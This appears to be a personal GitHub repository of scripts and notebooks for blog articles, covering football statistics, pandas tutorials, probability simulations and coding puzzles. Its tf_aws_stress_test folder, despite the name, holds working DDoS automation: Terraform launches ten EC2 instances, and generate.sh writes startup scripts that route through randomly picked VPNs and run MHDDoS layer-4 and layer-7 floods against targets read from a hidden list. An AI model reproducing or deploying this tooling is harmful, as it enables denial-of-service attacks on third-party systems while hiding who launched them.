├── images ├── leagues.jpg ├── seasons.jpg ├── full_table.JPG ├── understat.JPG ├── requests_response_1.jpg └── requests_response_2.jpg ├── README.md ├── .gitignore ├── data-visualisation-bokeh.py ├── data ├── cart.csv ├── results.csv └── dead_rusnia.csv ├── luck.py ├── playground.py ├── tf_aws_stress_test ├── go.sh ├── main.tf └── generate.sh ├── add_two_numbers_as_linked_list.py ├── select_random_hashtags.py ├── longest_palindromic_substring.py ├── time-series.py ├── 538_xG_data.py ├── task_glovo.py ├── time-checks-generalized-experiment.py ├── leveraging-dataframes-in-python.py ├── update_aws_sg.py ├── time-checks.py ├── leveraging-dataframes-in-python.ipynb ├── co2_world.py ├── lambda_web_scraper.py ├── circle.html ├── data_manipulation_with_standard_lib.ipynb ├── football_why_winners_win_and_losers_loose.ipynb ├── co2-bokeh.ipynb ├── is_football_fair.ipynb └── E-Commerce_ Predicting Sales.ipynb /images/leagues.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/leagues.jpg -------------------------------------------------------------------------------- /images/seasons.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/seasons.jpg -------------------------------------------------------------------------------- /images/full_table.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/full_table.JPG -------------------------------------------------------------------------------- /images/understat.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/understat.JPG -------------------------------------------------------------------------------- /images/requests_response_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_1.jpg -------------------------------------------------------------------------------- /images/requests_response_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_2.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Notebooks for Articles 2 | 3 | Repository with random scripts and IPython Notebooks that I use to write my articles 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | /*.csv 3 | *.png 4 | # *.jpg 5 | .ipynb_checkpoints 6 | .terraform* 7 | *tfstate* 8 | tf_aws_stress_test/targets_l4.txt 9 | tf_aws_stress_test/targets_l7.txt 10 | venv/ -------------------------------------------------------------------------------- /data-visualisation-bokeh.py: -------------------------------------------------------------------------------- 1 | from bokeh.io import output_file, show 2 | from bokeh.plotting import figure 3 | plot = figure(plot_width=400, tools='pan,box_zoom') 4 | plot.circle([1,2,3,4,5], [8,6,5,2,3]) 5 | output_file('circle.html') 6 | show(plot) 7 | -------------------------------------------------------------------------------- /data/cart.csv: -------------------------------------------------------------------------------- 1 | name,color,category,price,quantity 2 | t-shirt,black,top,20,1 3 | pants,white,bottom,50,1 4 | blazer,yellow,top,100,1 5 | t-shirt,red,top,15,2 6 | t-shirt,orange,top,25,1 7 | sneakers,white,footwear,100,1 8 | bracelet,green,accesories,5,3 -------------------------------------------------------------------------------- /luck.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | luck = 777 4 | actions = 100000 5 | total_hits = [] 6 | 7 | for i in range(actions): 8 | a = np.random.randint(0, 1000) 9 | if a == luck: 10 | total_hits.append(i) 11 | 12 | 13 | print(total_hits) 14 | print(len(total_hits)) 15 | -------------------------------------------------------------------------------- /playground.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | # df = pd.read_csv('data/data_blog.csv') 6 | 7 | res = requests.get('https://understat.com/league/La_liga/2017/') 8 | 9 | soup = BeautifulSoup(res.content) 10 | # print(soup.prettify()) 11 | 12 | table = soup.findAll('script') 13 | table 14 | -------------------------------------------------------------------------------- /data/results.csv: -------------------------------------------------------------------------------- 1 | team1,team2,goals1,goals2,result 2 | Barcelona,Granada,4,0,1 3 | Barcelona,Sevilla,1,1,X 4 | Barcelona,Athletic,2,1,1 5 | Barcelona,Cadiz,1,2,2 6 | Barcelona,Valencia,0,0,X 7 | Barcelona,Celta,3,2,1 8 | Barcelona,Girona,6,1,1 9 | Barcelona,Osasuna,1,0,1 10 | Barcelona,Real Madrid,4,0,1 11 | Barcelona,Betis,4,4,X 12 | Barcelona,Villarreal,4,2,1 -------------------------------------------------------------------------------- /tf_aws_stress_test/go.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 3 | set -x 4 | 5 | cd /home/ubuntu/MHDDoS 6 | source venv/bin/activate 7 | 8 | echo 'Starting' 9 | # sudo /etc/init.d/windscribe-cli start 10 | windscribe connect "Rakia" 11 | 12 | python3 start.py TCP 8.8.8.8:80 512 60 true 13 | python3 start.py TCP 8.8.8.8:443 512 60 true 14 | 15 | windscribe disconnect 16 | deactivate 17 | echo 'Finished, shutting down...' 18 | 19 | # sudo shutdown -------------------------------------------------------------------------------- /add_two_numbers_as_linked_list.py: -------------------------------------------------------------------------------- 1 | # Definition for singly-linked list. 2 | class ListNode(object): 3 | def __init__(self, x): 4 | self.val = x 5 | self.next = None 6 | 7 | class Solution: 8 | def addTwoNumbers(self, l1, l2, c = 0): 9 | # Fill this in. 10 | 11 | l1 = ListNode(2) 12 | l1.next = ListNode(4) 13 | l1.next.next = ListNode(3) 14 | 15 | l2 = ListNode(5) 16 | l2.next = ListNode(6) 17 | l2.next.next = ListNode(4) 18 | 19 | result = Solution().addTwoNumbers(l1, l2) 20 | while result: 21 | print result.val, 22 | result = result.next 23 | # 7 0 8 24 | -------------------------------------------------------------------------------- /select_random_hashtags.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import pandas as pd 3 | 4 | 5 | file = 'data/hashtags.csv' 6 | 7 | data = pd.read_csv(file) 8 | 9 | amount_of_tags = 27 10 | selected_tags = [] 11 | top_limit = len(data) 12 | 13 | for i in range(top_limit): 14 | rand_ind = np.random.randint(0, top_limit) 15 | to_select = data.iloc[rand_ind, 0] 16 | selected_tags.append(to_select) 17 | data.drop([rand_ind], axis=0) 18 | if len(selected_tags) == amount_of_tags: 19 | break 20 | 21 | for i in range(amount_of_tags): 22 | print('#'+selected_tags[i]) 23 | -------------------------------------------------------------------------------- /longest_palindromic_substring.py: -------------------------------------------------------------------------------- 1 | class Solution: 2 | def longest_palindrome(self, s): 3 | if s == s[::-1]: 4 | return s 5 | max_len = 2 6 | winners = [] 7 | for i in range(len(s)): 8 | for ln in range(i+1, len(s)+1): 9 | ss = s[i:ln] 10 | if ss == ss[::-1]: 11 | if len(ss) >= max_len: 12 | max_len = len(ss) 13 | winners.append(ss) 14 | 15 | winners = [x for x in winners if len(x) == max_len] 16 | 17 | return winners 18 | 19 | st = "aamamamnaa" 20 | print(Solution().longest_palindrome(st)) 21 | 22 | -------------------------------------------------------------------------------- /tf_aws_stress_test/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "~> 3.27" 6 | } 7 | } 8 | 9 | required_version = ">= 0.14.9" 10 | } 11 | 12 | provider "aws" { 13 | profile = "default" 14 | region = "eu-west-1" 15 | } 16 | 17 | resource "aws_instance" "android_terminator" { 18 | 19 | count = 10 20 | 21 | ami = "ami-0e0f48e669d76f99d" 22 | instance_type = "t2.micro" 23 | security_groups = ["no-security-no-cry"] 24 | user_data = "${file("go_${count.index}.sh")}" 25 | 26 | tags = { 27 | Name = "article-${count.index}" 28 | } 29 | volume_tags = { 30 | "Name" = "article-${count.index}" 31 | } 32 | } -------------------------------------------------------------------------------- /time-series.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | import matplotlib.pyplot as plt 4 | import glob 5 | import seaborn as sns 6 | 7 | sns.set() 8 | 9 | pattern = 'data/madrid*.csv' 10 | csv_files = glob.glob(pattern) 11 | 12 | frames = [] 13 | 14 | for csv in csv_files: 15 | df = pd.read_csv(csv, index_col='date', parse_dates=True) 16 | frames.append(df) 17 | 18 | df = pd.concat(frames) 19 | 20 | df_time = df[['O_3', 'PM10']][df['station'] == 28079008].dropna() 21 | 22 | df.sort_values 23 | 24 | df_plot = df_time.resample('M').mean() 25 | plt.plot(df_plot) 26 | plt.title('O3 and PM10 air polution levels') 27 | plt.ylabel('micrograms per cubic meter (mg/m3)') 28 | plt.xticks(rotation=45) 29 | plt.show() 30 | -------------------------------------------------------------------------------- /538_xG_data.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | 3 | URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv' 4 | data = pd.read_csv(URL) 5 | 6 | championship = data[data['league'] == 'English League Championship'] 7 | championship = championship[['season', 'date', 'team1', 'team2', 'xg1', 'xg2']] 8 | championship['xga1'] = championship['xg2'] 9 | championship['xga2'] = championship['xg1'] 10 | 11 | home_data = championship[['season', 'team1', 'xg1', 'xga1']] 12 | away_data = championship[['season', 'team2', 'xg2', 'xga2']] 13 | 14 | home_groupped = home_data.groupby(['season', 'team1']).mean().reset_index() 15 | away_groupped = away_data.groupby(['season', 'team2']).mean().reset_index() 16 | 17 | final_data = pd.merge(home_groupped, away_groupped, left_on=['team1','season'], right_on=['team2','season']) 18 | final_data.drop(['team2'], axis='columns', inplace=True) 19 | final_data.rename({'team1': 'team', 'xg1': 'xG_h', 'xga1': 'xGA_h', 'xg2': 'xG_a', 'xga2': 'xGA_a'}, axis='columns', inplace=True) 20 | 21 | final_data.to_csv('data/xGA_championship.csv', index=False) 22 | print("Done!") -------------------------------------------------------------------------------- /task_glovo.py: -------------------------------------------------------------------------------- 1 | heights = [9,8,7,8,9,5,6] 2 | # heights = [1,9,3,3,5,5,3,5,7,3] 3 | ln = len(heights) 4 | total_sum = 0 5 | 6 | 7 | def find_hole(heights): 8 | first_max = 0 9 | ind_first_max = 0 10 | second_max = 0 11 | ind_second_max = 0 12 | # find borders 13 | for ind, h in enumerate(heights): 14 | if h > first_max: 15 | ind_first_max, first_max = ind_second_max, second_max 16 | ind_first_max, first_max = ind, h 17 | elif (h >= second_max and ind != ind_first_max): 18 | ind_second_max, second_max = ind, h 19 | 20 | # if borders create a hole, calculate the volume 21 | if abs(ind_first_max-ind_second_max) > 1: 22 | reverse = [] 23 | for h in heights[ind_first_max:ind_second_max+1]: 24 | reverse.append(second_max-h) 25 | part_sum = sum([x for x in reverse if x>0]) 26 | else: 27 | part_sum = 0 28 | 29 | return part_sum, ind_first_max, ind_second_max 30 | 31 | 32 | start = 0 33 | finish = ln 34 | # go through the list looking for holes and calculating its volumes till the end 35 | while finish - start > 1: 36 | part_sum, ind_first_max, ind_second_max = find_hole(heights[start:finish]) 37 | total_sum += part_sum 38 | start += max([ind_second_max,ind_first_max]) 39 | 40 | 41 | print("Total sum: "+str(total_sum)) -------------------------------------------------------------------------------- /tf_aws_stress_test/generate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm -rf go_*.sh 3 | 4 | # Params 5 | LAYER=$1 6 | TARGETS=$2 7 | 8 | VPNS=("Goodbye Lenin" "Hermitage" "Shnur" "Rakia") 9 | MAX_INDEX=$(expr ${#VPNS[@]} - 1) 10 | COUNTER=0 11 | 12 | while IFS="" read -r TARGET || [ -n "${TARGET}" ] 13 | do 14 | RAND=$(shuf -i 0-${MAX_INDEX} -n 1) 15 | VPN=${VPNS[${RAND}]} 16 | if [[ $LAYER -eq 4 ]] 17 | then 18 | # Template 19 | cat << EOF > go_$COUNTER.sh 20 | #!/bin/bash 21 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 22 | set -x 23 | 24 | cd /home/ubuntu/MHDDoS 25 | source venv/bin/activate 26 | 27 | echo 'Starting' 28 | windscribe connect "$VPN" # vpn name as param from list 29 | 30 | python3 start.py $TARGET 256 3600 true # from list 31 | 32 | windscribe disconnect 33 | deactivate 34 | echo 'Finished, shutting down...' 35 | 36 | sudo shutdown 37 | EOF 38 | fi 39 | if [[ $LAYER -eq 7 ]] 40 | then 41 | # Template 42 | cat << EOF > go_$COUNTER.sh 43 | #!/bin/bash 44 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 45 | set -x 46 | 47 | cd /home/ubuntu/MHDDoS 48 | source venv/bin/activate 49 | 50 | echo 'Starting' 51 | windscribe connect "$VPN" # vpn name as param from list 52 | 53 | python3 start.py $TARGET 5 256 "" 200 60 true # from list 54 | 55 | windscribe disconnect 56 | deactivate 57 | echo 'Finished, shutting down...' 58 | 59 | sudo shutdown 60 | EOF 61 | fi 62 | let COUNTER=${COUNTER}+1 63 | done < ${TARGETS} -------------------------------------------------------------------------------- /time-checks-generalized-experiment.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | amount_of_checks = 1000 # how many times a person checks her/his phone 8 | 9 | np.random.seed(666) 10 | a = np.random.binomial(amount_of_checks, 0.044, size=10000) 11 | p_a_2 = np.sum(a > 1) / 10000 12 | p_a_3 = np.sum(a > 2) / 10000 13 | p_a_4 = np.sum(a > 3) / 10000 14 | print(" === Assuming average person checks their phone " + str(amount_of_checks) + " times per day === ") 15 | print("Probability of seeing 'lucky time' two times per day: " 16 | + str(p_a_2) + ", three: " + str(p_a_3) + ", four: " + str(p_a_4)) 17 | 18 | n_sequential = 0 19 | size = amount_of_checks 20 | sample = 1000000 21 | 22 | for s in range(sample): 23 | rare = np.random.random(size=size) < 0.044 24 | n_rare = np.sum(rare) 25 | if n_rare > 1: 26 | for i in range(size): 27 | if i == size-1: 28 | break 29 | elif rare[i] is True & rare[i+1] is True: 30 | n_sequential += 1 31 | if s % 1000 == 0: 32 | print('Processed: ' + str(s) + ' samples.') 33 | 34 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 35 | 36 | bins = np.arange(0, max(a) + 1.5) - 0.5 37 | 38 | # plt.subplot(3, 1, 1) 39 | plt.hist(a, bins=bins, normed=True, color='red') 40 | plt.title('Phone usage') 41 | plt.xlabel('Amount of "lucky hours spotted during the day"') 42 | plt.ylabel('Probability') 43 | plt.show() 44 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | 4 | cols = ['col0', 'col1', 'col2', 'col3', 'col4'] 5 | rows = ['row0', 'row1', 'row2', 'row3', 'row4'] 6 | data = np.random.randint(0, 100, size=(5, 5)) 7 | df = pd.DataFrame(data, columns=cols, index=rows) 8 | 9 | df.head() 10 | 11 | df['col1']['row1'] 12 | 13 | df.loc['row4', 'col2'] 14 | 15 | df.iloc[4, 2] 16 | 17 | df_new = df[['col1', 'col2']] 18 | df_new.head(3) 19 | 20 | df_new = df[['col1', 'col2']][1:4] 21 | df_new.head(3) 22 | 23 | df['col0'] 24 | df.loc[:, 'col0'] 25 | df.iloc[:, 0] 26 | 27 | df['col3'][2:5] 28 | 29 | df.loc['row1':'row4', :] 30 | df.iloc[1:4, :] 31 | 32 | df.loc[:, 'col1':'col4'] 33 | df.iloc[:, 1:4] 34 | 35 | df.loc['row1':'row4', 'col1':'col4'] 36 | df.iloc[1:4, 1:4] 37 | 38 | df.loc['row2':'row4', ['col1', 'col3']] 39 | df.iloc[[2, 4], 0:4] 40 | 41 | df[df['col1'] > 20] 42 | # assigning variable also works 43 | condition = df['col1'] > 20 44 | df[condition] 45 | 46 | df[(df['col1'] > 25) & (df['col3'] < 30)] # logical and 47 | df[(df['col1'] > 25) | (df['col3'] < 30)] # logical or 48 | df[~(df['col1'] > 25)] # logical not 49 | 50 | df.iloc[3, 3] = 0 51 | df.iloc[1, 2] = np.nan 52 | df.iloc[4, 0] = np.nan 53 | df['col5'] = 0 54 | df['col6'] = np.NaN 55 | df.head() 56 | 57 | df.loc[:, df.all()] 58 | 59 | df.loc[:, df.any()] 60 | 61 | df.loc[:, df.isnull().any()] 62 | 63 | df.loc[:, df.notnull().all()] 64 | 65 | df_na_any = df.dropna(how='any') # if any value in a row is NaN it will be dropped 66 | df_na_all = df.dropna(how='all', axis=1) # if all values in a row are NaN it will be dropped 67 | 68 | # Find a column based on another 69 | df['col1'][df['col2'] > 35] 70 | 71 | df['col1'][df['col2'] > 35] += 5 72 | df[df['col1'] > 35] 73 | 74 | df['new_col'] = df['col4'].apply(lambda n: n*2) 75 | 76 | df.index.str.upper() 77 | 78 | df.index.map(str.lower) 79 | 80 | red_vs_blue = {0:'blue', 12:'red'} 81 | 82 | df['color'] = df['col3'].map(red_vs_blue) 83 | df.head() 84 | 85 | df['col7'] = df['col3'] + df['col4'] 86 | df.head() -------------------------------------------------------------------------------- /update_aws_sg.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import boto3 3 | from botocore.exceptions import ClientError 4 | 5 | GROUP_ID = 'GROUP-ID' 6 | RULE_DESCRIPTION = 'Rule Description' 7 | NEW_IP = requests.get('http://checkip.amazonaws.com').text[:-1] + '/32' 8 | OLD_IP = '' 9 | 10 | ec2 = boto3.client('ec2') 11 | 12 | try: 13 | response = ec2.describe_security_groups(GroupIds=[GROUP_ID]) 14 | except ClientError as e: 15 | print(e) 16 | 17 | sg = response['SecurityGroups'] 18 | for el in range(len(sg)): 19 | if sg[el]['GroupId'] == GROUP_ID: 20 | ip_pems = sg[el]['IpPermissions'] 21 | for i in range(len(ip_pems)): 22 | if ip_pems[i]['IpRanges'][0]['Description'] == RULE_DESCRIPTION: 23 | OLD_IP = ip_pems[i]['IpRanges'][0]['CidrIp'] 24 | print('Old office Ip %s' % OLD_IP) 25 | 26 | if (OLD_IP != NEW_IP) & (OLD_IP != ''): 27 | try: 28 | d = ec2.revoke_security_group_ingress( 29 | GroupId = GROUP_ID, 30 | IpPermissions=[ 31 | { 32 | 'FromPort': 3306, 33 | 'ToPort': 3306, 34 | 'IpProtocol': 'tcp', 35 | 'IpRanges': [ 36 | { 37 | 'CidrIp': OLD_IP, 38 | 'Description': RULE_DESCRIPTION 39 | } 40 | ] 41 | } 42 | ] 43 | ) 44 | print('Ingress successfully removed %s' % d) 45 | except ClientError as e: 46 | print(e) 47 | 48 | try: 49 | d = ec2.authorize_security_group_ingress( 50 | GroupId = GROUP_ID, 51 | IpPermissions=[ 52 | { 53 | 'FromPort': 3306, 54 | 'ToPort': 3306, 55 | 'IpProtocol': 'tcp', 56 | 'IpRanges': [ 57 | { 58 | 'CidrIp': NEW_IP, 59 | 'Description': RULE_DESCRIPTION 60 | } 61 | ] 62 | } 63 | ] 64 | ) 65 | print('Ingress successfully set %s' % d) 66 | except ClientError as e: 67 | print(e) 68 | -------------------------------------------------------------------------------- /time-checks.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | np.random.seed(666) 8 | a_min = np.random.binomial(28, 0.044, size=10000) 9 | p_a_min_2 = np.sum(a_min > 1) / 10000 10 | p_a_min_3 = np.sum(a_min > 2) / 10000 11 | p_a_min_4 = np.sum(a_min > 3) / 10000 12 | print(" === Assuming average person checks their phone 28 times per day === ") 13 | print("Probability of seeing 'lucky time' two times per day: " 14 | + str(p_a_min_2) + ", three: " + str(p_a_min_3) + ", four: " + str(p_a_min_4)) 15 | 16 | a_avg = np.random.binomial(47, 0.044, size=10000) 17 | p_a_avg_2 = np.sum(a_avg > 1) / 10000 18 | p_a_avg_3 = np.sum(a_avg > 2) / 10000 19 | p_a_avg_4 = np.sum(a_avg > 3) / 10000 20 | print(" === Assuming average person checks their phone 47 times per day === ") 21 | print("Probability of seeing 'lucky time' two times per day: " 22 | + str(p_a_avg_2) + ", three: " + str(p_a_avg_3) + ", four: " + str(p_a_avg_4)) 23 | 24 | a_max = np.random.binomial(86, 0.044, size=10000) 25 | p_a_max_2 = np.sum(a_max > 1) / 10000 26 | p_a_max_3 = np.sum(a_max > 2) / 10000 27 | p_a_max_4 = np.sum(a_max > 3) / 10000 28 | print(" === Assuming average person checks their phone 86 times per day === ") 29 | print("Probability of seeing 'lucky time' two times per day: " 30 | + str(p_a_max_2) + ", three: " + str(p_a_max_3) + ", four: " + str(p_a_max_4)) 31 | 32 | n_sequential = 0 33 | size = 28 34 | sample = 100000 35 | 36 | for _ in range(sample): 37 | rare = np.random.random(size=size) < 0.044 38 | n_rare = np.sum(rare) 39 | if n_rare > 1: 40 | for i in range(size): 41 | if i == size-1: 42 | break 43 | elif rare[i] is True & rare[i+1] is True: 44 | n_sequential += 1 45 | 46 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 47 | 48 | bins_min = np.arange(0, max(a_min) + 1.5) - 0.5 49 | bins_avg = np.arange(0, max(a_avg) + 1.5) - 0.5 50 | bins_max = np.arange(0, max(a_max) + 1.5) - 0.5 51 | 52 | # plt.subplot(3, 1, 1) 53 | plt.hist(a_min, bins=bins_min, normed=True, color='red') 54 | plt.title('Minimum phone usage') 55 | plt.xlabel('Amount of "lucky hours spotted during the day"') 56 | plt.ylabel('Probability') 57 | plt.show() 58 | 59 | # plt.subplot(3, 1, 2) 60 | plt.hist(a_avg, bins=bins_avg, normed=True, color='green') 61 | plt.title('Average phone usage') 62 | plt.xlabel('Amount of "lucky hours spotted during the day"') 63 | plt.ylabel('Probability') 64 | plt.show() 65 | 66 | # plt.subplot(3, 1, 3) 67 | plt.hist(a_max, bins=bins_max, normed=True, color='blue') 68 | plt.title('Maximum phone usage') 69 | plt.xlabel('Amount of "lucky hours spotted during the day"') 70 | plt.ylabel('Probability') 71 | plt.show() 72 | 73 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 3, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pandas as pd\n", 10 | "import numpy as np" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": 18, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [ 19 | "cols = ['col1', 'col2', 'col3', 'col4', 'col5']\n", 20 | "rows = ['row1', 'row2', 'row3', 'row4', 'row5']\n", 21 | "df = pd.DataFrame(np.random.randint(0,100,size=(5, 5)), columns=cols, index=rows)" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 20, 27 | "metadata": {}, 28 | "outputs": [ 29 | { 30 | "data": { 31 | "text/html": [ 32 | "
| \n", 50 | " | col1 | \n", 51 | "col2 | \n", 52 | "col3 | \n", 53 | "col4 | \n", 54 | "col5 | \n", 55 | "
|---|---|---|---|---|---|
| row1 | \n", 60 | "81 | \n", 61 | "72 | \n", 62 | "33 | \n", 63 | "25 | \n", 64 | "89 | \n", 65 | "
| row2 | \n", 68 | "84 | \n", 69 | "39 | \n", 70 | "19 | \n", 71 | "85 | \n", 72 | "55 | \n", 73 | "
| row3 | \n", 76 | "61 | \n", 77 | "68 | \n", 78 | "76 | \n", 79 | "70 | \n", 80 | "60 | \n", 81 | "
| row4 | \n", 84 | "36 | \n", 85 | "97 | \n", 86 | "75 | \n", 87 | "84 | \n", 88 | "92 | \n", 89 | "
| row5 | \n", 92 | "72 | \n", 93 | "48 | \n", 94 | "19 | \n", 95 | "35 | \n", 96 | "69 | \n", 97 | "